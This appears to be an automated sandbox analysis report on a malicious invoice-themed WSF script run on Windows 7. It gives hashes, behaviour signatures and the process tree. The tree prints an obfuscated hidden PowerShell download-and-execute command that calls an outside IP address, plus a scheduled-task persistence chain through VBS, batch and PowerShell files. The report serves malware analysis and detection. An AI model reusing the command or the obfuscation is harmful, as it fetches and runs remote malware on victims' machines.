Analysis
-
max time kernel
128s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
15/11/2023, 17:36
Static task
static1
Behavioral task
behavioral1
Sample
Invoice#57348024.wsf
Resource
win7-20231020-en
General
-
Target
Invoice#57348024.wsf
-
Size
113KB
-
MD5
fa5cbc00cbaa12bb4b45fca8d5075587
-
SHA1
5d4c9493654c9abd21354bb9f3424726ade1b8f3
-
SHA256
c57ecd0aeea0978f281e66541e3645290619eb8bc36882a2155c3cd61fee91af
-
SHA512
0b1f0107e347b37f92de84dd8f277dda4cba2bec70f6342801b8c51c4efa216a16be68aeeac42f95b7d90c44e548a541c68488ce1242b6d04b777439c7bff219
-
SSDEEP
768:H88888888888g88888888888Z88888888888V88888888888h88888888888g88t:u
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1740 WScript.exe 5 2372 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2372 powershell.exe 1044 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1740 wrote to memory of 2372 1740 WScript.exe 28 PID 1740 wrote to memory of 2372 1740 WScript.exe 28 PID 1740 wrote to memory of 2372 1740 WScript.exe 28 PID 2128 wrote to memory of 2884 2128 taskeng.exe 34 PID 2128 wrote to memory of 2884 2128 taskeng.exe 34 PID 2128 wrote to memory of 2884 2128 taskeng.exe 34 PID 2884 wrote to memory of 3064 2884 WScript.exe 35 PID 2884 wrote to memory of 3064 2884 WScript.exe 35 PID 2884 wrote to memory of 3064 2884 WScript.exe 35 PID 3064 wrote to memory of 1044 3064 cmd.exe 37 PID 3064 wrote to memory of 1044 3064 cmd.exe 37 PID 3064 wrote to memory of 1044 3064 cmd.exe 37 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice#57348024.wsf"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/T2.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {621E7F4B-3D81-4514-BE1E-95609E1AD55A} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\libraries.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\libraries.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\libraries.ps1'"4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0SEUEWKVE1EWJUV6V9MK.temp
Filesize7KB
MD5b7d4b468b2ca222fb1effc4c9af39d4d
SHA148cc3f0f3d1d3f17291cddaa0ae9946bef7b07bc
SHA256ff58f3831330d8b034b04c539c4482c25d0364a64883c07e5c669facb9811434
SHA512328d15cb8edac3fbf01bbeb7734fa53c38e1317c57e1f501ffe533e719a42767e39d383c48a68f98bb3667f95e5d8159ec37402d4144d6ffa8b48a9ab06cfc2a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ae53949ecef5bb08672d3fc437236623
SHA13bd18aa9c9f02a1a6be0c5ead2dbafb3cf5dcc00
SHA256fe1285eeb97678918274be551bcf5ce715d1178e96efaf624c9c87f11c957201
SHA512743fc454bfca48e6582d1aafc0ba2209ddb4e3c5d50570068a84437eb74ed40324536fdb1b54b30bcfe4fb8d53212117e6afe1221ce0a6f6cb3f27c4a6da6915
-
Filesize
210B
MD5440e905a6fcf6bcc0ffe763896e21044
SHA189bf89ca871095dd7431147a4e0c993bfdba897e
SHA256aae3e34c1f6bf5eaf7c91afec528d24ac1b10272705be506653b29df17d6e834
SHA512f324dbff528e9579f81af84c09ab45ef87cd8e516cb22a5f99e432d4d1ca528f3e5d8f7a1f479076a89c18cd44bbaa10df4f6a1fcdc3fe8937febadb892d89fd
-
Filesize
691B
MD5882c260115cfacc236251d065cc23c4c
SHA1cee58dd936e493370224db57ca49c4d6c0cbfeff
SHA2561d1595fdd363891dd2d9d081059b2dcbca1edc72c80b6c637436a9090ba2564a
SHA512d1279bcc0150ba96164445a98fdb5ff5ef6cde81460af71612ee0f0a7ac8155f9d3a73aa26ccb53a9da6493e078aef42e20ca26011f0f5aa855f5ced61236641